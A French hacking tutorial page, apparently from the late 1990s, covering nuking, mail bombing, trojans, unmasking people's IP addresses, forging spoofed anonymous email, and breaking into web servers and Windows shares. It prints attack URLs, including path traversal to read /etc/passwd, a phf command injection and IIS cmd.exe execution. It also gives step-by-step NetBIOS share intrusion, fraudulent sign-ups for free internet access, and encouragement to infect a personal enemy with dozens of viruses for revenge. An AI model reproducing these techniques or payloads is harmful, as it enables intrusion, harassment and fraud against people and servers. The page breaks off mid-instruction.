"; ?> Document sans titre

   
     
     
   
             

Le Nuking :

Le nuking consiste à faire planter l'ordinateur de quelqu'un à distance. Soit son écran devient tout bleu, soit il se fige... l'ordinateur peut même se mettre à faire un reboot (redémarrage). Toutes ces choses désagréables peuvent vous arriver si le hacker ennemi a obtenu votre IP. Pour ceux qui ne le sauraient pas, l'IP se présente sous la forme de quatre chiffres compris entre 0 et 255. Votre IP ressemble donc à ça : 171.252.65.2. L'IP est un renseignement très précieux que l'on peut obtenir d'après votre UIN (numéro ICQ), à l'aide de logiciels spécifiques. Ne donnez donc pas votre UIN à tort et à travers ! A part la prudence, la meilleure défense est certainement Nuke Nabber (voir + bas). Ce petit logiciel filtre les messages qui entrent sur votre machine et vous prévient quand une tentative de nuking a été repoussée.Heureusement que je suis là, grâce à moi vous pouvez vous procurer NukeNabber (697 Ko).

 

Le Mail Bombing :


Si, lorsque vous vérifiez votre e-mail, vous vous apercevez que vous venez de recevoir 1000 messages, deux possibilités s'offrent à vous. Soit quelqu'un vous aime vraiment très fort, soit vous venez de vous faire mail bomber... Bien que votre ordinateur ne risque rien lors de ce genre d'attaque, ce n'est jamais très agréable lorsque ça vous arrive. De plus, certains logiciels permettent au hacker de choisir lui-même le nombre de mails qu'il va vous envoyer. Il peut donc très bien vous en envoyer 1 000 000 !!! Que faire ? Il vous faut ce programme serait pas mal du tout : E-mail Remover . Il est en anglais mais trè simple d'utilisation, il vous permet de voir les messages que vous avez reçu sur votre compte et de les effacer sans avoir à les télécharger. Magique hein ? Si vous savez qui est votre harceleur, signalez-le à son fournisseur d'accès ("Monsieur, monsieur, lui il m'embête !!!"). Il devrait vraisemblablement prendre des mesures, car le mail bombing est illégal. Ou autrement, et cela est valable pour toutes les autres attaques, vous pouvez signaler sur un chat dont vous savez qu'il a l'habitude d'aller, qu'il s'amuse à vous harceler, qu'il est méchant pas beau etc... Si vous avez de la chance, un hacker plus fort que lui sera présent et lui règlera son compte ! Sinon, dites aux gens de se méfier de lui, il devrait calmer un peu le jeu après ça.


Les intrusions HD :
Les intrusions HD (Hard Drive, ou disque dur) sont un autre type d'attaque. Le hacker aura préalablement dû vous infecter avec un trojen. Un trojen est un petit fichier (entre 300 et 500 ko en général) que vous recevez sur votre HD. Une fois que vous l'ouvrez, soit rien ne se passe, soit un message d'erreur anodin apparaît ("Une ligne dll n'a pas été trouvée... blablabla"). C'est rien que du pipeau ! Une fois que vous avez double-cliqué dessus, le mal est fait... un port de communication aura été ouvert sur votre HD, permettant au hacker de vous infiltrer. Vous comprenez mieux pourquoi ces petits fichiers s'appellent aussi des chevaux de Troie ? Le principe en est exactement le même ! Le hacker aura aussi besoin d'obtenir votre IP. Selon le logiciel qu'il utilise, les capacités de votre ennemi seront différentes. Comment savoir que vous êtes infiltrés ? Toutes sortes d'évènements étranges : votre lecteur CD s'ouvre et se ferme tout seul, des sons se jouent sans raison apparente, le pointeur de votre souris qui bouge tout seul, votre imprimante qui imprime n'importe quoi, des programmes qui se lancent sans raison apparente, votre clavier qui ne répond plus, les boutons de la souris qui s'inversent, le moniteur qui s'éteint, des fichiers qui disparaissent ou qui apparaissent mystérieusement. Plus amusant : vous allez aux toilettes, et votre disque dur a été vidé entre temps... j'arrête, vous allez finir par tomber dans la parano ! Les risques sont infinis ! Dans une certaine mesure, votre agresseur peut mieux contrôler votre machine que vous ! Voilà pour les symptômes...

Comment remédier à cela ? Encore une fois, la prudence est la meilleure des défenses. N'acceptez tout simplement aucun fichier d'un étranger tout simplement parce qu'il a un nom aguicheur ! Le hacker, pour vous infiltrer, va devoir vous envoyer le fameux fichier, le trojen, et il devra donc jouer sur votre crédulité. Si vous ne recevez aucun fichier suspect, vous ne craignez absolument rien. Vous pouvez aussi recevoir des fichiers de 2 ou 3 ko les yeux fermés ! Les trojens sont assez imposants. Au cas où le hacker n'aurait pas renommé le trojen (ne comptez quand même pas trop là-dessus !), voilà les principaux : Boserve.exe, Patch.exe, Systeme patch.exe, pastouche.exe. N'acceptez donc aucun fichier qui porte ce nom. Sachez aussi que le hacker ne peut vous infiltrer que si vous êtes connecté à Internet, si trop de choses suspectes se produisent, déconnectez vous en urgence. Si les problèmes persistent lorsque vous vous reconnectez, vous avez touché le gros lot, une magnifique intrusion HD ! Ne vous reconnectez plus tant que vous n'aurez pas augmenté votre niveau de sécurité. Utilisez vite les logiciels de nettoyage que vous avez, ils vous seront d'une grande aide (vous pourrez les télécharger un peu plus loin). Ces programmes vont effacer le trojen, et le hacker ne pourra donc plus vous faire d'intrusions. En combinant plusieurs logiciels, vous obtiendrez une défense très efficace, et vous serez protégés contre les attaques les plus courantes.


Le flooding :
Ah... ICQ...ce logiciel si utile à tous les internautes de la planète...une véritable aubaine pour les hackers ! Non seulement il permet de retrouver votre IP plus efficacement (nécessaire pour vous nuker ou s'introduire sur votre HD), mais il permet une nouvelle sorte d'attaque : le flooding ! Bon, c'est pas très grave, mais c'est assez ennuyeux. Imaginez tout simplement que des dizaines de personnes apparaissent brusquement dans votre contact list (des personnes virtuelles), et que chacune vous envoie un ou plusieurs messages... Vous pouvez ainsi très bien vous retrouver avec plus de 500 messages sur les bras, plus toutes ces personnes virtuelles à effacer...


Le Crashing :
Un crasher c'est un mec qui entre dans un réseau informatique où il est interdit de visite et qui y fout le souk. Il remplace des données, les effaces, rends le système inutilisable... il peut pour cela s'y prendre de diverses manières: les virus (que cet abruti d'Henry a encore foutu dans l'ordinateur), les troyens... Mais le résultat est le même, la destruction de la base de données (quoi que je connais des virus, notamment celui du jeudi noir qui ne détruit rien et ne se contente que de bouffer du temps CPU pour survivre et s'étendre). Je ne soutiens aucunement ce genre d'agissements car non seulement ça détruit des fichiers plus ou moins important auquel des gens peuvent tenir mais ça donne également une mauvaise image du hacking qui nous fait passer pour des bads boys aux yeux de la population.


Comment hacker un site web :
Ici, nous allons prendre comme exemple de site: www.site.com. Sous Windows, vous faites: Démarrer/exécuter et vous tapez "ftp". Vous voyez apparaître des commandes DOS et vous êtes dans le répertoire ftp. Tapez: open www.site.com Tapez: quote user ftp (une série de texte apparaît). Tapez: quote cwd ~root (vous voyez *please login user and pass). Tapez: quote pass ftp. Voilà, si le serveur n'est pas protégé, vous êtes dessus...!!! Mais bon espérez pas devenir ROOT dessus vous vous faites de faux espoirs...!


Connaître l'adresse IP d'1 connecté sur IRC ou ICQ :
Ce n'est pas très difficile, sur IRC, vous tapez la commande /dns pseudo et vous allez voir dans "Status". Si le connecté a omis de cacher celle-ci, elle apparaîtra, si ce n'est pas le cas vous aurez son nom de serveur par ex: PPP-215-48-infonie.fr, pas de panique...ouvrez une fenêtre MS-DOS et tapez la commande suivante : ping -a PPP-215-48-infonie.fr vous verrez apparaître son adresse IP. Sur ICQ, vous allez dans votre liste de contacts, vous cliquez sur le pseudo puis sur info, si l'utilisateur a caché son IP vous verrez apparaître dans le champs prévu à cet effet N/A, pas de panique...!!! Laissez la fenêtre "info" ouverte, mettez votre ICQ sur "off line" fermez la fenêtre "info" recliquez sur le pseudo réouvrez la fenêtre " info" et là, comme par magie,son IP devient visible...!!!

Sur AOL, il faut Serv-u, vous devez faire un lien ftp://votre IP, et la balancer au gars dans un message éclair, quand celui-ci aura cliqué, vous verrez apparaître son IP.

Si vraiment vous avez un compte a régler avec une personne vous pouvez l'infecter avec de nombreux virus très dévastateurs. C'est à mon avis le meilleur moyen de se venger car si vous supprimez des fichiers windows le gars va reformater son disque et puis fini quoi , si vous l'avez sur icq et si il n'est pas trop bête il va changer d'iun et puis vous aurez tout perdu alors quand l'infectant avec une 30 de virus ça va contaminer toutes ses disquettes , si il grave peut être même ses CD-ROM et la il n 'est pas prêt d'en avoir fini avec ses problèmes et vous de savourer votre vengeance...!!!

Autrement beaucoup d'autres conneries pas méchantes mais ne faites surtout pas comme certain de style "Je viens de te hacker et je vais reformater ton disque" en disant ça vous êtes sur qu'il va débrancher la ligne tout de suite...!!!

Mais bon soyez kewwwl il ne faut pas que vous confondiez hackeur et crashers, vous ne devez hacker que part defi ou à la limite pour vous défendre mais en aucun cas vous ne devez vous introduire dans l'ordinateur de quelqu'un qui ne vous a rien fais pour détruire son contenu vous devez le faire juste par défi car sur IRC vous pouvez tomber sur 1 pro en matière de HACKING et la vous serriez vraiment mais vraiment très mal...!!! Pensez au pauvre gars qui se retrouve sans pc alors qu'il n'a rien fais...!!!


Qu'est ce qu'une adresse IP (Internet Protocol) :
Pour ceux qui ne le savent pas, chaque ordinateur connecté à Internet en a une et elle sert à recevoir les informations que l'on demande via Internet Explorer où Netscape, etc...et également à recevoir des E-Mails. Pour une question de sécurité ou de volonté de disponibilité d'adresses pour tout le monde, les adresses IP qui vous sont données par votre fournisseur d'accès changent à chaque connexion (IP dynamiques). Ce qui n'est pas le cas pour les serveurs et les sites de Fac par exemple. Donc si vous trouvez l'adresse IP d'une personne, il est très fortement probable qu'elle ne lui appartienne plus le lendemain...!!! Comment trouver son ip...??? Tapez démarrer, exécuter, winipcfg, là vous obtiendrez des informations sur votre pc avec entre autre votre adresse ip. Si cette commande ne marche pas car vous n'avez tout simplement pas ce fichier, il existe une autre méthode, c'est des autonuker...je sais c'est barbare mais on ne risque rien si l'on a placé une protection efficace...!!! Si vous n'avez pas Winipcfg.exe, Cliquez ici pour le downloader.


Qu'est ce qu'un Sniffer :
Un sniffer c'est un logiciel qui permet d'intercepter des paquets sur un réseau. Cela s'avère très utile pour intercepter des adresses ip ou des contenus de paquets susceptibles de passer les firewalls. Cela permet aussi de connaître les noms d'hôtes autorisés ainsi que leur adresses MAC, etc... plein de bonnes choses utiles quoi...!!!


Qu'est ce qu'un Scanner d'IP :
C'est un programme qui permet de savoir, à partir d'une adresse ip valable, à quel serveur elle appartient. Il permet également de savoir si le port que vous avez spécifié est ouvert sur tel ou tel machine. Il existe pleins de scanners très bien genre cyberkit et Wingate...!!!


Qu'est ce que le Spoofing :
Ah ça c'est de la haute voltige...c'est pas pour les lamerZ...!!! Ca consiste en quoi...changer son adresse ip pour contourner des firewall ou autre protections ou pour ne pas se faire repérer, ne pas se faire tracer, passer incognito quoi. Les tout étant de prendre une ip qui n'aurait aucune chance de pouvoir vous être attribué quoi. Ca permet également d'intercepter des données transitant sur le réseaux pour les retourner vers soi. Different hacking quoi...c'est du balaise...!!!


NukeNabber et Port Watchers :
NukeNabber est un port watcher, c'est à dire que c'est un programme qui a pour fonction de fermer vos ports d'écouter ce qui passe dessus. Ca permet de savoir à tout moment si quelqu'un essaye de rentrer sur votre machine, de vous nuker, de scanner vos ports, de vous flooder, d'ouvrir une session ftp...de plus ça vous donne l'ip du mec qui veut rentrer :-). Ce programme est donc indispensable pour votre sécurité. J'ai pas fais un article pour vous expliquer ça, sinon ça va servir à qui...C'était juste un interlude. Ce que je vais vous expliquer ici, c'est comment le paramètrer. Parce que les paramètres de bases sont très insuffisants pour vous garantir une bonne sécurité. Il ne faut rentrer dans NukeNabber que les ports qui sont indispensables, car même si vous pouvez en mettre jusqu'à 50, les mettre tous ralentirait votre connection. De plus en écoutant certains ports comme les ports 27, 28 et 29 par exemple qui sont actuellement utilisés, NukeNabber vous marque "Port 29 (tcp) is already in use" et là ça sert à rien car non seulement personne ne pouvait passer par là avant du fait qu'une autre application passait par ce port mais en plus ça bloquera l'application. Vous voulez essayer...mettez le port 29/tcp sous écoute et vous verrez ce que Netscape va vous dire quand vous essaierez de vous connecter à mon site (ou à n'importe quel site sur Internet, mais ça vous donnera une excuse pour revenir. Il en faut une...!!! :o))))

Ah ouais mais pour cela il faudrait que vous sachiez comment mettre tel ou tel port sous écoute. Vous allez dans File, options, advanced. Vous allez dans la liste des ports watchés et vous faites descendre l'ascenseur jusqu'à ce que vous voyez un "unassigned", cliquez dessus, puis mettez le numéro du port dans "port to monitor" et le protocole dans "protocol". Les protocole c'est tcp, udp ou tcmp. Tout ça c'est affaire de réseaux, j'expliquerais plus tard à quoi ça correspond et ce qui différencie les paquets arrivants de ces différents réseaux. Après appuyez sur "Add" et voilà, le port est watché. Il sera sous écoute dès que vous appuierez sur Ok. Utilisez les options de ports par défaut. Les différents ports dangereux à écouter sont les suivants. J'explique aussi pourquoi chaque port est dangereux. Sachez qu'en règle générale si vous ne fermez pas ces ports vous êtes à 100% exposé au risque d'être nuké, floodé et votre pc de se transformer en serveur ftp ou telnet pour troyens...!!!

 

 
 

Sommaire

Lexique
Mail anonymes
Hacker un serveur web
Obtenir une connexion internet gratuite
Lexique du hacking
Les adresses IP
Hack sous Windows 95/98
Hack par FTP
Les trojans (chevaux de troie)
Les passwords
Les ports
IP Spoofing
Les Scripts CGI

 


Petit lexique

Les proxys : un relais accélérateur et protecteur

Proxy-cache Internet : mission vitesse
Surfer plus vite grâce au proxy ?? Affirmatif, du moins... en partie. Car il s'agit bien de l'un des rôles du serveur Proxy-cache. Il sert à améliorer le temps de réponse moyen à une requète Web et à optimiser la bande passante sur la ligne qui nous raccorde à Internet. Me croire sur parole, c'est bien =;o), mais le comprendre, c'est mieux. Admettons que votre navigateur qoit configuré mai dans la main avec le serveur proxy de votre fournisseur d'accés. Lorsque vous demandez le chargement d'une page, votre navigateur commence donc par interroger ce serveur. Si par le plus pur des hasards un autre utilisateur du serveur proxy-cache a déja interrogé ce même document il l'a gardé en stock, sur son dique local. Vous en bénéficiez, le proxy disqose des données et vous les envoie direcement. D'où : temps de réponse bien plus rapide. La majorité des serveurs proxys disposent d'une gestion automatiséecapable de purger et mettre à jour les documents. Ainsi, l'utilisateur garde en permanence la consultation de la version la plus récente d'un document.

Le proxy-firewall : le relais camoufle votre i.p.
Le second rôle d'un serveur proxy est d'assurer une fonction de firewall, littéralement coupe-feu, entre votre ordinateur et le reste du Web. La raison ?? Diminuer les risques nés de cette porte que vous ouvrez sur la planète, car le Web est une vraie passoire.

Lorsque vous activez un lien sur la page d'un site Web, le navigateur envoie au serveur qui héberge cette page une requète contenant l'adresse du site, suivie du nom de la page html souhaitée. Pour que le serveur puisse vous envoyer ( ndlr : pas en l'air mais voyons !!)le résultat de votre requète, il faut qu'il ait votre adresse. Le protocole TCP/IP prévoit qu'elle soit intégrée à la requète. Logique ! Ce qui n'était pas trop prévu, c'est que de petits malins, les hackers; iraient jusqu'a récuperer votre adresse IP soit pour faire un petit tour sur votre machine, soit pour se faire passer pour vous. Explications !! En analysant le routage sourece d'IP, l'agresseur récupère votre adresse IP et la substitue à la sienne, histoire de faire croire qu'il est autorisé par le serveur du fournisseur d'accés. Rien de bien grave, sauf si le serveur en question est celui de votre réseau local. Imaginez votre comptable s'en aller vers un petit et vous comprendrez mieux l'ampleur des risques. Autre danger : le pirate à récupéré votre adresse IP, rien ne le prive d'envoyer virus et programmes destructeurs de vos fichiers et disques durs à travers des appelets java et autres ActiveX. La défense offerte par le firewall consiste à ne divulguer que l'adresse IP du proxy lors d'une conversation vers un site Internet. La votre reste bien cachée, vous restez à l'abri de toute usurpation et de toute attaque directe. L'utilisation s'un proxy comme cache accélérateur connaît des limites précises : celle du ou des disques du proxy lui-même. En revanche, un proxy de protection se montrera à la hauteur de la technologie mise en oeuvre. Elle varie avec les types de protection, depuis les "coupe-feu" et les filtreurs de paquets jusqu'aux routeurs, passerelles, ordinateur bastion, etc... Leur efficacité réelle dépend de la manière dont ils sont installés et configurés. S'ils sont efficaces contre la plupart des agressions de hackers, ils le sont moins contre les virus et les vandales...

Certains fournisseurs d'accès configurent automatiquement les serveurs proxys. On à recours dans ce cas à une adresse de serveur dotée d'un script CGI (il assure la connexion directe au proxy). Avantage : lorsque le cache du proxy ne contient pas l'information, il renvoie automatiquement à un proxy différent. L'utilisateur saute alors de cache en cache en une fraction de seconde jusqu'a ce que la page souhaitée soit trouvée. De quoi au apssaeg, libérer la bande passante !!


Mail anonymes

Outre les programmes qui permettent d'envoyer des mail anonymes, vous pouvez aussi les envoyer avec telnet.
[source RhylKim]

En gros ça sert à quoi de faire des E-Mails anonymes? Ca a plein de débouchés: on peut faire des farces à des potes, on peut l'utiliser pour que personne ne connaisse notre fournisseur d'accès et ne puisse remonter jusqu'à nous, ça peut également servir pour être plus crédible si on fait du social engineering par E-Mail, ça peut permettre de décrédibiliser quelqu'un, de froisser des relations entre deux personnes, ...

Voilà, ça commence ici ---> Pour envoyer des E-Mails anonymes, vous aurez besoin de telnet. Le telnet de base suffira, celui livré avec win 95/98 ou avec le cd de votre fournisseur d'accès internet sera largement suffisant. Pour trouver telnet, faites une recherche sur le disque. Dès que vous aurez cliqué dessus, une fenêtre s'ouvrira, vous irez dans préférence et cocherez les cases suivantes: "écho local" (cela permettra de visualiser ce que vous écrivez), "VT 100/ANSI" (le type de terminal) et une zone tampon non inférieur à 25 (taille de la mémoire). Maintenant que vous l'avez paramètré, il va falloir vous connecter à un serveur à l'aide de telnet. Si vous étiez déconnecté du réseau, utilisez votre fournisseur d'accès pour vous reconnecter avant de vous connecter à l'aide de telnet.

Pour vous connecter, faites: Connection, système distant. Dans "nom de l'hôte" mettez le nom d'un serveur qui permet à n'importe qui d'envoyer du courrier (www.worldnet.net ira très bien mais il y en a d'autres). Dans "port", mettez "25" (merci PeaceNuker pour la rectification) et dans "type de terminal", mettez "vt 100". Et maintenant connectez vous à l'aide du bouton "connecter".

Je vais maintenant expliquer la manière d'envoyer un Mail anonyme à l'aide d'un exemple, ce sera à mon avis plus facile à comprendre:
Ce qui est en bleu c'est ce que l'on tape
Ce qui est en vert c'est ce que le serveur répond
Ce qui est en blanc c'est soit telnet soit des remarques de ma part


Une fois connecté comme expliqué plus haut, le serveur devrait vous répondre un truc du genre:
220-poseidon.worldnet.net Microsoft SMTP MAIL ready at Sun, 20 Feb 1999 22:15:31
+0100 Version: 5.5.1775.675.6
220 ESMTP spoken here
A présente il faut taper:
HELO ESMTP
(ESMTP est valable dans ce cas la mais ca dépend en fait de ce que le serveur vous répondra avant, a vous de voir et de changer les ordres en conséquence)
Le serveur vous répond:
250 poseidon.worldnet.net Hello [152.207.22.131]
Maintenant il va falloir choisir ce que vous voulez que le destinataire voit apparaitre dans la fenêtre "from", c'est a dire l'adresse du mec pour qui vous vous ferez passer.
MAIL FROM: <bozoleclown@compuserve.com>
Le serveur répondra alors:
250 <bozoleclown@compuserve.com>... sender ok
(Ici vous vous ferez passez pour un mec s'appelant bozo le clown et étant abonné à compuserve. Il n'est pas nécessaire que vous soyez abonné à compuserve pour le faire).
Là vous rentrez le nom du destinataire:
RCPT TO: <assassin@infonie.fr>
(Ici le nom du destinataire est assassin et il est sur infonie. L'adresse doit obligatoirement exister sinon cela ne marchera pas. Il n'est pas non plus nécessaire d'être abonné à infonie pour que cela marche. Si vous avez des problemes)
Le serveur vous indique qu'il a trouvé le destinataire:
250 <assassin@infonie.fr>... Recipient ok
Vous allez maintenant pouvoir taper le message mais avant de le faire, vous devez indiquez que vous voulez taper un message en mettant:
DATA
Le serveur vous répond et vous indique comment faire:
354 Please enter your message body, ending with a "." on a line by itslef
(Là vous allez entrer un message, celui que vous voulez mais pour le terminer vous devrez mettre un point ou un tiret (ça dépendra de ce que vous dit le serveur) seul sur une ligne à la fin de votre message, c'est pour indique que votre message est fini.)
Là j'entre le message que je veux:
Salut mon pote,
C'est toujours d'accord pour la bouffe de samedi?
Je raconte tout plein de conneries.
là c'est la fin du message.
Au revoir et @+
.
(La vous avez envoyé le message sans oublier de mettre le point sur une ligne seule)
Le serveur vous répond que le courrier est envoyé:
250 Message accepted for delivery
Voilà, c'est de la balle, c'est fini, pour sortir de telnet vous faites:
QUIT

Attention: Bon, vous l'aurez compris c'est assez simple d'envoyer un E-Mail anonyme. Pour s'amuser c'est cool mais si vous voulez faire des menaces ou des biz avec ça c'est autre chose. Il faut juste que vous sachiez un truc, le serveur utilisé pour envoyer le Mail peut garder votre adresse ip. Donc si vous utilisez un brouilleur d'ip il n'y aura pas de problème. Si vous n'en avez pas mais que votre fournisseur d'accès utilise des ip dynamiques (ip qui changent à chaque connection), ça devrait être bon, prudence cependant car je sais que les fournisseurs d'accès gardent mles ipet les noms correspondants mais je ne sais mlheureusement pas pour combien de temps. Bien sûr si vous n'avez pas de blooffer, vous pouvez spoofer votre connection

NOTE: Si vous ayez des problèmes avec ce que je viens de vous expliquer, et plus particulièrement au moment d'écrire l'adresse de la personne qui devra recevoir le mail. Ne niez pas, ça arrive souvent. Et ben c'est parce que le serveur que vous avez choisi n'accepte d'envoyer de mails qu'en local. C'est à dire dans l'exemple d'aol, il n'acceptera d'envoyer de mail qu'à des adresses finissants par "@aol.com". Aol c'est un mauvais exemple car c'est pas leur cas il me semble mais je crois que c'est le cas de Worldnet. :-(

HACKER UN SERVEUR WEB

Vous trouverez ici quelques techniques qui vous permettre de hacker un serveur WEB
De maniere generale elles consistent a recuperer le fichier /etc/passwd


HTTP - htmlscript
SERVICE
http

BUG
Htmlscript (http://www.htmlscript.com/) vous autorise l'acces aux fichiers systemes du serveur.

IMPACT
Les utilisateurs sans droits peuvent via leur navigateur lire n'importe quel fichier systeme du serveur.

EXEMPLE
Il suffit de taper:
http://www.victime.com/cgi-bin/htmlscript?../../../../../etc/passwd
Le nombre de repertoires est lie bien sur a l'emplacement du fichier "passwd" ou du fichier que vous voulez lire et aussi de l'emplacement du repertoire "CGI-BIN".


--------------------------------------------------------------------------------

HTTP - phf
SERVICE
http

BUG
Le script phf distribue avec le serveur http NCSA, version NCSA/1.5a et anterieures
ainsi que le serveur Apache anterieure a la version 1.0.5 ne filtrent pas certaines requettes

IMPACT
Via le WEB les utilisateurs peuvent executer certaines commandes par l'intermediaire du daemon http

HISTORIQUE
Le bug a ete decouvert le 12 mars 1996
Une liste de serveurs est disponible par l'intermediaire
de commandes speciales de ALTA VISTA


EXEMPLE
http://victime.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Cet exemple vous permet de recuperer le fichier /etc/passwd a partir d'un serveur vulnerable.


--------------------------------------------------------------------------------

HTTP - php.cgi
SERVICE
http

BUG
Voici un bug identique a celui de phf decrit ci dessus

EXEMPLE
http://victime.com/cgi-bin/php.cgi?/etc/passwd
Vous permet de recuperer comme le phf le fichier /etc/passwd


--------------------------------------------------------------------------------

HTTP - Microsoft IIS/1.0 pre service pack 3
SERVICE
http

PROGRAMME
Microsoft internet-Server/1.0 anterieure au pack 3

BUG
Le serveur autorise certaines commandes en dehors du chemin initial

IMPACT
Les utilisateurs peuvent prendre le control du serveur :)

DESCRIPTION
Il est possible de recuperer des fichiers et d'executer des commandes en dehors
du chemin "www" en ajoutant ".." dans le chemin d'acces.
Dans les exemples suivants le chemin d'acces envisage de IIS est c:\inetsrv et
pour Windows NT c:\winn35
http://your.host.name/scripts/anyold.cmd?&dir+c:\
http://your.host.name/scripts/anyold.bat?&dir+c:\
http://your.host.name/..\..\autoexec.bat
http://your.host.name/scripts/../../../winnt35/win.ini
http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+set
http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+echo+"Hi There"+>c:\temp\hello.txt
http://your.host.name/scripts/..\..\WINNT35\SYSTEM32\XCOPY.EXE?+c:\autoexec.bat+c:\temp

Obtenir une connexion internet gratuite

le prestataire, effectivement, c est lui la base même de votre
connexion, sans lui rien n est possible.Connecter vous sur le site de Havas on line,
évidement vous n avez pas de prestataire, pas de problème configurer un accès réseau
a distance avec les paramètre suivant:

- Login : ABONNEMENT Password : HAVAS Tèl : 0141525290

Une fois ceci fait prenez votre navigateur préféré et allez a l adresse suivante:
-http://www.hol.fr puis faite un clic sur abonnement 65F la remplissez le formulaire
en déclarant une adresse bidon un numéro de téléphone bidon, etc...enfin notez bien le
login et le password qui vous sera fourni et confirmez la requête.

Voila ca y est vous possédez maitenant un prestataire gratuitement pendant un
mois,ce qui est décrit ci-dessus est donc a renouveler tous les mois, n oubliez pas non
plus de relever le numéro de téléphone du prestataire Havas on line le plus près de
chez vous, ces imbéciles vous donne carrément la liste téléphonique de tous les sites de
france.


Tiens, votre IP c'est 164.138.95.198.(C'est bien par là que commence le hacking?)

-LES ADRESSES IP :

Ca c'est la base du HACKING sans l'adresse IP de votre cible vous n'arriverez à rien! (excepté toutes les techniques de lamerz : punters, mailbombing, etc). Toutes les techniques abordées sur cette page (ou presque) nécessitent de connaître cette adresse IP.


-Définition :

Une adresse IP c'est quoi exactement? C'est la représentation numérique d'une adresse binaire 32bits. Elle se présente de la manière suivante : xxx.xxx.xxx.xxx, mais vu que c'est du 32bits elle ne pourra pas dépasser 255.255.255.255. Cette adresse vous sert à recevoir des mails etc. Elle vous est donnée par votre provider, et elle change à chaque connexion (IP dynamiques).

-Comment trouver une adresse IP ? :

La question qui est le plus souvent posée sur le salon Pirates de AOLOL !! Je vais donc essayer d'y répondre. En fait tout dépend des conditions dans lesquelles vous vous trouvez :

-Sa propre IP :

Et oui ça à l'air con comme ça mais c'est le commencement. Pour connaitre votre IP cliquez sur démarrer, puis exécuter, et là vous tapez winipcfg, une fois que vous aurez cliqué sur ok un tableau apparaîtra avec diverses infos, dont votre IP.


-Sous IRC :

Pour trouver l'IP d'un mec sous IRC, rien de plus simple : /dns pseudo_du_mec (vous devez taper cette commande sous IRC).


-Sous ICQ :

Il y a deux méthodes, aussi simples l'une que l'autre:
-Avec ICQ 98 (et seulement le 98!). Vous allez dans les infos du mec mais là son IP est cachée :( Pour y remedier vous devez mettre votre ICQ off-line (fleur rouge) et là...OH MIRACLE son ip apparaît :)
-Pour tous ceux qui possèdent une autre version d'ICQ il existe des petits progz qui trouvent l'IP avec le numéro d'ICQ de la vicitime. Nous en avons mis un dans la section PROGZ de ce site : ICQipsniffer.

-IP d'un serveur :

Toujours aussi simple. Sous DOS tapez ping -a Adresse_du_serveur (ex: ping -a www.aol.com). Vous allez avoir en réponse la vitesse à laquelle vous communiquez avec ce site mais vous aurez ausi son IP :)

-Avec serveur mail POP3 :

Il est possible d'avoir l'IP d'une personne qui vous envoie un mail, mais seulement si il a été envoyé par un serveur POP3 (Hotmail, etc). Vous pouvez essayer de convaincre le mec de vous écrire en passant par un de ces serveurs (en disant par exemple que votre boîte aux lettres à été mail bombée...) et quand vous recevrez le mail vous descendez après le message et vous avez une partie où il y a écrit des adresses de serveurs etc, là dedans il y a son IP, mais c'est tres chiant, car pour rester cradible vous devez envoyer le mail depuis un serveur POP3, et c'est pas sûr que le mec vous réponde.

-Avec un Firewall :

Cette méthode est bien plus simple que la version avec Serv-U. Le principe est toujours le meme ; vous devez faire en sorte que la cible se connecte sur votre pc. Avec un firewall, c'est bien plus pratique. Lorsque le mec va se connecter, il sera automatiquement bloque et vous aurez son ip. Cela evite de transformer votre becane en serveur ftp, ce qui est toujours emmerdant car un serveur ftp peurt etre hacké facilement, surtout si vous ne changez pas les passwords... Le reste de la technique ne change pas, vous n'avez qu'à envoyer un link sur votre ip : ftp://votre_ip. Et oui, c'est le gros défaut de cette technique : la cible aura votre IP, mais la plupart des gens ne s'en rendront même pas compte si vous faîtes votre lien comme il faut. En cliquant la victime aura un message d'erreur de son browser, mais vous vous aurez son IP. Cette technique marchera même avec les mecs qui connaissent bien le net, mais évitez de l'utiliser dans les chats pirates...

-En se faisant nuker :

Ca c'est une technique que je trouve très marrante. Avant tout vous devez absolument vous équiper d'un anti nuke, ou beaucoup mieux, d' un firewall. Voilà c'est tout con, il suffit de se faire passer pour un gros crétin et de donner votre IP au premier lamer venu. Il ne résistera pas à la tentation de vous nuker, et là grâce à l'un des progz cités plus tôt, il ne vous arrivera rien mais vous aurez l'IP de celui qui a essayé de vous nuker.

-LE HACK SOUS WINDOWS 9x

Bon alors ça c'est archi connu et très facile, mais ça marche pas souvent.
Pour ce hack vous avez besoin de deux choses :


-l'adresse ip de votre cible
-Que votre victime aie les ressources partagées


Et oui ça fait beaucoup, surtout que peu de personnes ont les ressources paratgées sur leur PC, mais bon...
Maintenant que vous avez l'adressse IP de la victime, on va voir les differentes étapes du hack:

1°)Ouvrez une fenêtre DOS et tapez ce qui suit : (respecter les majuscules et les espaces)


nbtstat -A ip_du_mec


Si vous obtenez "Host not found" vous pouvez laisser tomber, c'est que la cible n'a pas NetBios installé donc pas de hack possible...de cette manière :)
Pour que ce soit bon vous devez obtenir un tableau dans ce genre :


Name
Type
Status

-------------------------------------------------------

Lamer
<00> UNIQUE
Registered

CowBoyz
<00> GROUP
Registered

Lamer
<03> UNIQUE
Registered

Lamer
<20> UNIQUE
Registered

CowBoyz
<1E> GROUP
Registered

MAC Adress = 36-54-98-75-00-00

La ligne bleue est la seule qui nous intéresse.
Le <20> est essentiel.
Il doit y avoir 3 UNIQUE et 2 GROUP.


2°)Une fois que toutes les conditions sont remplies, vous restez sous DOS, et vous tapez :


edit lmhosts


Vous Vous retrouvez alors dans l'éditeur du DOS. Vous allez devoir taper ce qui suit (en respectant les majuscules et les parenthèses) :


ip_de_l'ordinateur nom_de_l'ordinateur #PRE


3°)Vous enregistrez et retournez sous DOS.
4°)Vous devez être dans c:/windows et taper la commande suivante :


nbtstat -R

Là vous devez obtenir : "Successful purge and preload of the NBT Remote Cache Name Table". Sinon vous aurez : "Failed to purge and preload of the NBT Remote Cache Name Table".

5°)Dernière étape : cliquez sur Démarrer=>Rechercher=>Ordinateur et vous tapez le nom de l'ordinateur (dans notre exemple c'est "lamer"). S'il apparaît c bon :) Vous avez plus qu'à double-cliquer dessus et vous serez sur son systeme!

-HACK PAR FTP :

Ce hack est très simple mais il a un inconvénient : il marche de moins en moins... Les serveurs sont de plus en plus protégés mais il y en a toujours pas mal, et j'essayerai de vous filer quelques adresses de sites que l'ont peut hacker de cette manière. Mais avant tout on va voir la technique :
Ce hack s'effectue sous ftp. Pour ouvrir ftp, cliquez sur Démarrer=>Executer=>ftp -n
